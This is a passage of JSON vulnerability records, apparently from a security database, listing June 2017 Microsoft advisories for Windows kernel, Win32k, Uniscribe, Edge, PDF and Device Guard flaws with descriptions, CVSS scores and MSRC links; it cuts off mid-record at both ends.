"https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8524", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n\nThe update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Uniscribe Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0282", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0282", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0282", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nThere are multiple ways an attacker could exploit this vulnerability.\n\n * In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit this vulnerability and then convince a user to view the website. An attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by getting them to click a link in an email message or in an Instant Messenger message that takes users to the attacker's website, or by opening an attachment sent through email.\n\n * In a file sharing attack scenario, an attacker could provide a specially crafted document file that is designed to exploit this vulnerability, and then convince a user to open the document file.\n\nThe security update addresses the vulnerability by correcting how the Windows font library handles embedded fonts.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Win32k Graphics Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8527"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8527", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8527", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:23", "description": "A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit the vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by way of enticement in an email or Instant Messenger message, or by getting them to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Microsoft Edge handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8497", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8497", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8497", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8472", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8472", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8472", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8482", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8482", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8482", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application.\n\nThe security update addresses the vulnerability by correcting how the Windows kernel initializes memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8462", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8462", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8462", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8490", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8490", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8490", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:22", "description": "An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8468", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8468", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8468", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8488", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8488", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8488", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An information disclosure vulnerability exists in Microsoft Windows when a user opens a specially crafted PDF file. An attacker who successfully exploited the vulnerability could read memory in the context of the current user.\n\nTo exploit the vulnerability, an attacker would have to trick the user into opening the PDF file.\n\nThe update addresses the vulnerability by modifying how Windows parses PDF files.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows PDF Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8460", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8460", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8460", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:23", "description": "A remote code execution vulnerability exists in Microsoft Windows, Microsoft Word 2013 and Microsoft Word 2016 if a user opens a specially crafted PDF file. An attacker who successfully exploited the vulnerability could cause arbitrary code to execute in the context of the current user.\n\nTo exploit the vulnerability, an attacker must entice the user to open a specially crafted PDF file.\n\nThe update addresses the vulnerability by modifying how Windows and Microsoft Word parse PDF files.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows PDF Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0292", "CVE-2017-8529"], "modified": "2017-07-11T07:00:00", "id": "MS:CVE-2017-0292", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0292", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8491", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8491", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8491", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A security feature bypass vulnerability exists when Microsoft Windows fails to enforce case sensitivity for certain variable checks, which could allow an attacker to set variables that are either read-only or require authentication.\n\nTo exploit this vulnerability, an attacker could run a specially crafted application to bypass Unified Extensible Firmware Interface (UEFI) variable security in Windows.\n\nThe security update addresses the vulnerability by correcting security feature behavior to enforce case sensitivity for certain variable checks.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8493"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8493", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8493", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this vulnerability could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.\n\nTo exploit the vulnerability, an attacker would first have to access the local machine, and then inject malicious code into a script that is trusted by the Code Integrity policy. The injected code would then run with the same trust level as the script and bypass the Code Integrity policy.\n\nThe update addresses the vulnerability by correcting how PowerShell exposes functions and processes user supplied code.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0173", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0173", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0173", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8465", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8465", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8465", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:23", "description": "A remote code execution vulnerability exists in Microsoft Windows if a user opens a specially crafted .pdf file. An attacker who successfully exploited the vulnerabilities could cause arbitrary code to execute in the context of the current user.\n\nIf a user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nThe update addresses the vulnerabilities by modifying how Windows parses .pdf files.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows PDF Remote Code Execution", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 